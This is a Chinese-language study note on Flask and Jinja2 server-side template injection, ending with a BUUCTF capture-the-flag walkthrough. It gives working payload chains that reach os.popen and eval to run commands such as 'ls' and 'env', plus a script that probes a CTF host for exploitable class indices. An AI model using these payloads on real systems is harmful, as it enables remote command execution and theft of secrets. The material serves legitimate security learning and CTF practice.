flask框架

Flask是一个Python编写的Web 微框架，让我们可以使用Python语言快速实现一个网站或Web服务。我们可以使用flask框架来快速搭建web

flak框架基础代码


from flask import Flask#从flask模块里导入Flask类
app = Flask(__name__)#创建
@app.route('/')#路由规则
def hello1():
    return "hello"
@app.route('/lll')#静态路由
def hello2(name):
    return "hello lll"
@app.route('/<name>')#动态路由
def hello2(name):
    return "hello %s" % name
@app.route('/id/<int:ID>')#变量为int型的动态路由
def ID(ID):
    return 'you ID is %d'%ID
@app.route('/num/<float:num>')#float型动态路由
def num(num):
    return 'you num is %f' % num
if __name__=='__main__':
    app.run(host="0.0.0.0",debug=True)#开启debug，host端口全监控

代码解析

route路由

使用@app.route(‘/‘)来定义路由，路由分为静态路由与动态路由，静态路由如@app.route('/lll')只有搜索/lll才会触发
动态路由如@app.route('/<name>')通过<>在/后插入变量name只要访问/加上任意字符即可触发
当路由触发时会执行路由下定义好的函数，动态路由可以将路由的参数传到函数中如


@app.route('/<name>')#动态路由
def hello2(name):
    return "hello %s" % name

会将/后的作为参数传送到hell2(name)函数的name里，这使用函数返回hello name，会直接返回到web里如下
Alt text

http方法，redirect重定向，render_template

GET和post方法

from flask import Flask, render_template, request, redirect, url_for

app = Flask(__name__)
@app.route('/', methods=['GET', 'POST'])
def index():
    return render_template('index.html')#返回html相当于直接返回index.html这个模板
@app.route('/login', methods=['GET', 'POST']) #传参模式为post和get
def login_page():
    if request.method == 'POST':
        name=request.form['lss']
        return redirect(url_for('name', name1=name))#若为post则使用redirect重定向配合url_for将其定向到/name下，传递参数name1=name name1为/name/<name1>的参数name1
    else:
        name=request.args.get('lss')
        return redirect(url_for('name', name1=name))
@app.route('/name/<name1>')#接收redirect传来的参数name1
def name(name1):
    return "hello %s" %name1
if __name__ == '__main__':
    app.run(debug=True,host='0.0.0.0')

#index.html
<html lang="en">
    <body>
        <form action="http://127.0.0.1:5000/login" method="post">
            <p>输入你的名字:<input type="text" name="lss"/> </p>
            <p><input type="submit" value="submit"></p>
        </form>
    </body>
</html>

Redirect重定向相当于页面跳转

flask模板

from flask import Flask, render_template, request, redirect, url_for

app = Flask(__name__)
@app.route('/',methods=['GET','POST'])
def ban():
    hello="Hello World!"
    num=request.args.get('num')#获取get传的num参数
    return render_template("index.html",str=hello,int=num)#将hello和num传入模板中
if __name__ == '__main__':
    app.run(debug=True,host='0.0.0.0')

<html lang="en">
    <body>
        <p>这是一个模板<p>
        <p>{{ str }}<P>
        <br>{{ int }}
    </body>
</html>

上面所书写的便是模板，模板就是我们个人写在templates文件夹下的html文件。所谓模板就是一个html文件占位符，可以直接将参数传入文件的占位符里。以达到动态显示的目的。
html文件内写的{{int}}就是占位符，我们可以利用render_template向html传入参数。传入的参数num是由get传入的我们传入的不同输出的也不同。

flask模板漏洞

模板注入的成因和之前学过的漏洞成因相似都是因为其过滤不严导致的漏洞。具体如下
Alt text
上图是使用上面的代码所运行的结果，利用的是render_templaste可以看出我们输入1*1输出还是1*1这是因为会先将内部的变量进行预渲染，使其变量成为单纯的字符串也就是转义了导致其失去了功能性，也就不存在ssti漏洞。
由于上面的代码的html文件中占位符都是由{{}}所包裹所以保持原样输出。
Alt text
这个代码我们可以看到其是使用render_template_string()这个函数与render_template()在功能上相差无几只是render_template_string()这个函数是使用字符串作为参数，将字符串作为模板渲染，而render_template()是将文件作为模板进行渲染。
由于其与render_template()无太大差别我们可以很轻松的看出其也木有ssti漏洞因为其占位符仍是由{{}}来包裹

下面为出现漏洞的代码
Alt text
我们可以看到其是使用{0}加上format()来进行直接插入的这样就导致了其不会进行预渲染，就会使其产生ssti漏洞。
当我们使用get传值传入{{1*1}}是就会返回1。我们输入的1*1被执行了。

我们也可以输入JavaScript的指令，我们可以发现其也存在xss漏洞
Alt text
当然xss漏洞还不是造成危害最大的，这个ssti漏洞还会被利用为信息泄露，任意文件读取，RCE等漏洞，

补充

Jinja2模板引擎中使用{{}}标识符包裹的内容会被解析成一个表达式，并且会在服务器端进行求值和渲染。如果使用{{}}中包含的是可执行的命令语句；此时这个命令语句会被执行；所以此时我们加上{{}}标识符的目的就是为了使得被{{}}包裹的内容当作变量来解析替换。

父类与子类

所谓父类就是这个类的上一级而子类就是该类的下一级，所以类的父类不断的向上找父类最终会找到object这一类，我们就可以利用object的子类来进行操作。

class A:pass
class B(A):pass
class C(B):pass
class D(B):pass
c=B()
d=D()

print(c.__class__.__base__)#查找c的父类
print(c.__class__.__base__.__base__)#查找c父类的父类
print(d.__class__.__mro__)#不断查找c的父类直到object
print(d.__class__.__mro__[3])#选择查找父类结果的第4个
print(c.__class__.__base__.__base__.__subclasses__())#查找父类的父类下的所有子类
print(c.__class__.__base__.__base__.__subclasses__()[0])#选择第一个

输出结果
<class '__main__.A'>
<class 'object'>
(<class '__main__.D'>, <class '__main__.B'>, <class '__main__.A'>, <class 'object'>)
<class 'object'>
[<class 'type'>, <class 'async_generator'>, <class 'bytearray_iterator'>, <class 'bytearray'>, <class 'bytes_iterator'>, <class 'bytes'>, <class 'builtin_function_or_method'>, <class 'callable_iterator'>, <class 'PyCapsule'>, <class 'cell'>, <class 'classmethod_descriptor'>, <class 'classmethod'>, <class 'code'>, <class 'complex'>, <class '_contextvars.Token'>, <class '_contextvars.ContextVar'>, <class '_contextvars.Context'>, <class 'coroutine'>, <class 'dict_items'>, <class 'dict_itemiterator'>, <class 'dict_keyiterator'>, <class 'dict_valueiterator'>, <class 'dict_keys'>, <class 'mappingproxy'>, <class 'dict_reverseitemiterator'>, <class 'dict_reversekeyiterator'>, <class 'dict_reversevalueiterator'>, <class 'dict_values'>, <class 'dict'>, <class 'ellipsis'>, <class 'enumerate'>, <class 'filter'>, <class 'float'>, <class 'frame'>, <class 'frozenset'>, <class 'function'>, <class 'generator'>, <class 'getset_descriptor'>, <class 'instancemethod'>, <class 'list_iterator'>, <class 'list_reverseiterator'>, <class 'list'>, <class 'longrange_iterator'>, <class 'int'>, <class 'map'>, <class 'member_descriptor'>, <class 'memoryview'>, <class 'method_descriptor'>, <class 'method'>, <class 'moduledef'>, <class 'module'>, <class 'odict_iterator'>, <class 'pickle.PickleBuffer'>, <class 'property'>, <class 'range_iterator'>, <class 'range'>, <class 'reversed'>, <class 'symtable entry'>, <class 'iterator'>, <class 'set_iterator'>, <class 'set'>, <class 'slice'>, <class 'staticmethod'>, <class 'stderrprinter'>, <class 'super'>, <class 'traceback'>, <class 'tuple_iterator'>, <class 'tuple'>, <class 'str_iterator'>, <class 'str'>, <class 'wrapper_descriptor'>, <class 'zip'>, <class 'types.GenericAlias'>, <class 'anext_awaitable'>, <class 'async_generator_asend'>, <class 'async_generator_athrow'>, <class 'async_generator_wrapped_value'>, <class '_buffer_wrapper'>, <class 'Token.MISSING'>, <class 'coroutine_wrapper'>, <class 'generic_alias_iterator'>, <class 'items'>, <class 'keys'>, <class 'values'>, <class 'hamt_array_node'>, <class 'hamt_bitmap_node'>, <class 'hamt_collision_node'>, <class 'hamt'>, <class 'sys.legacy_event_handler'>, <class 'InterpreterID'>, <class 'line_iterator'>, <class 'managedbuffer'>, <class 'memory_iterator'>, <class 'method-wrapper'>, <class 'types.SimpleNamespace'>, <class 'NoneType'>, <class 'NotImplementedType'>, <class 'positions_iterator'>, <class 'str_ascii_iterator'>, <class 'types.UnionType'>, <class 'weakref.CallableProxyType'>, <class 'weakref.ProxyType'>, <class 'weakref.ReferenceType'>, <class 'typing.TypeAliasType'>, <class 'typing.Generic'>, <class 'typing.TypeVar'>, <class 'typing.TypeVarTuple'>, <class 'typing.ParamSpec'>, <class 'typing.ParamSpecArgs'>, <class 'typing.ParamSpecKwargs'>, <class 'EncodingMap'>, <class 'fieldnameiterator'>, <class 'formatteriterator'>, <class 'BaseException'>, <class '_frozen_importlib._WeakValueDictionary'>, <class '_frozen_importlib._BlockingOnManager'>, <class '_frozen_importlib._ModuleLock'>, <class '_frozen_importlib._DummyModuleLock'>, <class '_frozen_importlib._ModuleLockManager'>, <class '_frozen_importlib.ModuleSpec'>, <class '_frozen_importlib.BuiltinImporter'>, <class '_frozen_importlib.FrozenImporter'>, <class '_frozen_importlib._ImportLockContext'>, <class '_thread.lock'>, <class '_thread.RLock'>, <class '_thread._localdummy'>, <class '_thread._local'>, <class 'winreg.PyHKEY'>, <class '_io.IncrementalNewlineDecoder'>, <class '_io._BytesIOBuffer'>, <class '_io._IOBase'>, <class 'nt.ScandirIterator'>, <class 'nt.DirEntry'>, <class '_frozen_importlib_external.WindowsRegistryFinder'>, <class '_frozen_importlib_external._LoaderBasics'>, <class '_frozen_importlib_external.FileLoader'>, <class '_frozen_importlib_external._NamespacePath'>, <class '_frozen_importlib_external.NamespaceLoader'>, <class '_frozen_importlib_external.PathFinder'>, <class '_frozen_importlib_external.FileFinder'>, <class 'codecs.Codec'>, <class 'codecs.IncrementalEncoder'>, <class 'codecs.IncrementalDecoder'>, <class 'codecs.StreamReaderWriter'>, <class 'codecs.StreamRecoder'>, <class '_abc._abc_data'>, <class 'abc.ABC'>, <class 'collections.abc.Hashable'>, <class 'collections.abc.Awaitable'>, <class 'collections.abc.AsyncIterable'>, <class 'collections.abc.Iterable'>, <class 'collections.abc.Sized'>, <class 'collections.abc.Container'>, <class 'collections.abc.Buffer'>, <class 'collections.abc.Callable'>, <class '_winapi.Overlapped'>, <class 'os._wrap_close'>, <class 'os._AddedDllDirectory'>, <class '_sitebuiltins.Quitter'>, <class '_sitebuiltins._Printer'>, <class '_sitebuiltins._Helper'>, <class '_multibytecodec.MultibyteCodec'>, <class '_multibytecodec.MultibyteIncrementalEncoder'>, <class '_multibytecodec.MultibyteIncrementalDecoder'>, <class '_multibytecodec.MultibyteStreamReader'>, <class '_multibytecodec.MultibyteStreamWriter'>, <class '__future__._Feature'>, <class 'itertools.accumulate'>, <class 'itertools.batched'>, <class 'itertools.chain'>, <class 'itertools.combinations'>, <class 'itertools.compress'>, <class 'itertools.count'>, <class 'itertools.combinations_with_replacement'>, <class 'itertools.cycle'>, <class 'itertools.dropwhile'>, <class 'itertools.filterfalse'>, <class 'itertools.groupby'>, <class 'itertools._grouper'>, <class 'itertools.islice'>, <class 'itertools.pairwise'>, <class 'itertools.permutations'>, <class 'itertools.product'>, <class 'itertools.repeat'>, <class 'itertools.starmap'>, <class 'itertools.takewhile'>, <class 'itertools._tee'>, <class 'itertools._tee_dataobject'>, <class 'itertools.zip_longest'>, <class 'operator.attrgetter'>, <class 'operator.itemgetter'>, <class 'operator.methodcaller'>, <class 'reprlib.Repr'>, <class 'collections.deque'>, <class 'collections._deque_iterator'>, <class 'collections._deque_reverse_iterator'>, <class 'collections._tuplegetter'>, <class 'collections._Link'>, <class 'types.DynamicClassAttribute'>, <class 'types._GeneratorWrapper'>, <class 'functools.partial'>, <class 'functools._lru_cache_wrapper'>, <class 'functools.KeyWrapper'>, <class 'functools._lru_list_elem'>, <class 'functools.partialmethod'>, <class 'functools.singledispatchmethod'>, <class 'functools.cached_property'>, <class 'contextlib.ContextDecorator'>, <class 'contextlib.AsyncContextDecorator'>, <class 'contextlib._GeneratorContextManagerBase'>, <class 'contextlib._BaseExitStack'>, <class '_virtualenv._Finder'>, <class 'ast.AST'>, <class 'enum.nonmember'>, <class 'enum.member'>, <class 'enum._auto_null'>, <class 'enum.auto'>, <class 'enum._proto_member'>, <enum 'Enum'>, <class 'enum.verify'>, <class 're.Pattern'>, <class 're.Match'>, <class '_sre.SRE_Scanner'>, <class '_sre.SRE_Template'>, <class 're._parser.State'>, <class 're._parser.SubPattern'>, <class 're._parser.Tokenizer'>, <class 're.Scanner'>, <class '_tokenize.TokenizerIter'>, <class 'tokenize.Untokenizer'>, <class 'textwrap.TextWrapper'>, <class 'traceback._Sentinel'>, <class 'traceback.FrameSummary'>, <class 'traceback._ExceptionPrintContext'>, <class 'traceback.TracebackException'>, <class '__main__.A'>]
<class 'type'>

魔术方法

__class__#查找该类为什么
__base__#查找该类的父类
__mro__#不断查找父类直到查找到object为止
__subclasses__()#查找该类下的所有子类我们可以在后面加上[index]通过改变index的参数来查找固定的类
__init__#初始化用于将查找到object下的子类模板初始化
__globals__#以字典的形式返回查询到的方法的属性等，字典类似于c的数组

1
2

__subclasses__()查看当前类的子类，格式变量.__class__.__bases__[0].__subclasses__()
这个类也可以加数组来查看指定的索引值，例如变量.__class__.__bases__[0].__subclasses__()[1]

payload构造步骤

1.寻找内置类所对应的类

使用class来获取内置类所对应的类；可以使用str、dict、tuple、list进行获取也就是可以将单引号改为"",[],{}

1	{{''.__class__}}

2.找到object

利用魔术方法__base__，__mro__来寻找

1 2	{{''.__class__.__base__}}#base要多个直到找到object为止 {{''.__class__.__mro__[xxx]}}#选择最后一个父类的索引

3.查找object下的所有子类

1	{{''.__class__.__mro__[xxx].__subclasses()__}}

4.选择可以getshell的类

常用的为os._wrap_close

1	{{''.__class__.__mro__[xxx].__subclasses__()[xxx]}}

5.调用getshell指令

我们将类进行初始化在查看器下面的所有方法

1	{{"".__class__.__bases__[0].__subclasses__()[xxx].__init__.__globals__}}

在方法里面直接寻找popen，eval等

1	{{"".__class__.__bases__[0].__subclasses__()[xxx].__init__.__globals__['popen']('ls').read()}}

使用模块builtins来进行

1	{{''.__class__.__bases__[0].__subclasses__()[xxx].__init__.__globals__['__builtins__']['eval']('__import__("os").popen("ls /").read()')}}

buuctf [flask]ssti

我们打开靶机，在url上输入?name=49回显49发现ssti漏洞
我们输入

1	?name={{__class__.__base__.__subclasses__()}}

打开源码ctrl+f搜索os._wrap_close发现存在这个类我们可以利用以下脚本来寻找该类的位置

import requests
for i in range(500):
    url="http://node5.buuoj.cn:29862/?name={{%27%27.__class__.__base__.__subclasses__()["+str(i)+"]}}"
    r=requests.get(url=url)
    if 'os._wrap_close' in r.text:
        print(i)

输出117
我们输入以下内容

1	?name={{__class__.__base__.__subclasses__()[117].__init__.__globals__}}

同样搜索popen方法查看是否存在，
Alt text

其flag是存在于环境变量里，以下payload。

1	http://node5.buuoj.cn:29862/?name={{%27%27.__class__.__base__.__subclasses__()[117].__init__.__globals__['popen']('env').read()}}

除了上面的还有以下

1	{{''.__class__.__bases__[0].__subclasses__()[166].__init__.__globals__.__builtins__['eval']("__import__('os').popen('env').read()")}}

常用模板

类的知识总结（转载)

__class__            类的一个内置属性，表示实例对象的类。
__base__             类型对象的直接基类
__bases__            类型对象的全部基类，以元组形式，类型的实例通常没有属性 __bases__
__mro__              此属性是由类组成的元组，在方法解析期间会基于它来查找基类。
__subclasses__()     返回这个类的子类集合，Each class keeps a list of weak references to its immediate subclasses. This method returns a list of all those references still alive. The list is in definition order.
__init__             初始化类，返回的类型是function
__globals__          使用方式是 函数名.__globals__获取function所处空间下可使用的module、方法以及所有变量。
__dic__              类的静态函数、类函数、普通函数、全局变量以及一些内置的属性都是放在类的__dict__里
__getattribute__()   实例、类、函数都具有的__getattribute__魔术方法。事实上，在实例化的对象进行.操作的时候（形如：a.xxx/a.xxx()），都会自动去调用__getattribute__方法。因此我们同样可以直接通过这个方法来获取到实例、类、函数的属性。
__getitem__()        调用字典中的键值，其实就是调用这个魔术方法，比如a['b']，就是a.__getitem__('b')
__builtins__         内建名称空间，内建名称空间有许多名字到对象之间映射，而这些名字其实就是内建函数的名称，对象就是这些内建函数本身。即里面有很多常用的函数。__builtins__与__builtin__的区别就不放了，百度都有。
__import__           动态加载类和函数，也就是导入模块，经常用于导入os模块，__import__('os').popen('ls').read()]
__str__()            返回描写这个对象的字符串，可以理解成就是打印出来。
url_for              flask的一个方法，可以用于得到__builtins__，而且url_for.__globals__['__builtins__']含有current_app。
get_flashed_messages flask的一个方法，可以用于得到__builtins__，而且url_for.__globals__['__builtins__']含有current_app。
lipsum               flask的一个方法，可以用于得到__builtins__，而且lipsum.__globals__含有os模块：{{lipsum.__globals__['os'].popen('ls').read()}}
current_app          应用上下文，一个全局变量。

request              可以用于获取字符串来绕过，包括下面这些，引用一下羽师傅的。此外，同样可以获取open函数:request.__init__.__globals__['__builtins__'].open('/proc\self\fd/3').read()
request.args.x1   	 get传参
request.values.x1 	 所有参数
request.cookies      cookies参数
request.headers      请求头参数
request.form.x1   	 post传参	(Content-Type:applicaation/x-www-form-urlencoded或multipart/form-data)
request.data  		 post传参	(Content-Type:a/b)
request.json		 post传json  (Content-Type: application/json)
config               当前application的所有配置。此外，也可以这样{{ config.__class__.__init__.__globals__['os'].popen('ls').read() }}
g

常见过滤器（转载）

常用的过滤器

int()：将值转换为int类型；

float()：将值转换为float类型；

lower()：将字符串转换为小写；

upper()：将字符串转换为大写；

title()：把值中的每个单词的首字母都转成大写；

capitalize()：把变量值的首字母转成大写，其余字母转小写；

trim()：截取字符串前面和后面的空白字符；

wordcount()：计算一个长字符串中单词的个数；

reverse()：字符串反转；

replace(value,old,new)： 替换将old替换为new的字符串；

truncate(value,length=255,killwords=False)：截取length长度的字符串；

striptags()：删除字符串中所有的HTML标签，如果出现多个空格，将替换成一个空格；

escape()或e：转义字符，会将<、>等符号转义成HTML中的符号。显例：content|escape或content|e。

safe()： 禁用HTML转义，如果开启了全局转义，那么safe过滤器会将变量关掉转义。示例： {{'<em>hello</em>'|safe}}；

list()：将变量列成列表；

string()：将变量转换成字符串；

join()：将一个序列中的参数值拼接成字符串。示例看上面payload；

abs()：返回一个数值的绝对值；

first()：返回一个序列的第一个元素；

last()：返回一个序列的最后一个元素；

format(value,arags,*kwargs)：格式化字符串。比如：{{ "%s" - "%s"|format('Hello?',"Foo!") }}将输出：Helloo? - Foo!

length()：返回一个序列或者字典的长度；

sum()：返回列表内数值的和；

sort()：返回排序后的列表；

default(value,default_value,boolean=false)：如果当前变量没有值，则会使用参数中的值来代替。示例：name|default('xiaotuo')----如果name不存在，则会使用xiaotuo来替代。boolean=False默认是在只有这个变量为undefined的时候才会使用default中的值，如果想使用python的形式判断是否为false，则可以传递boolean=true。也可以使用or来替换。

length()返回字符串的长度，别名是count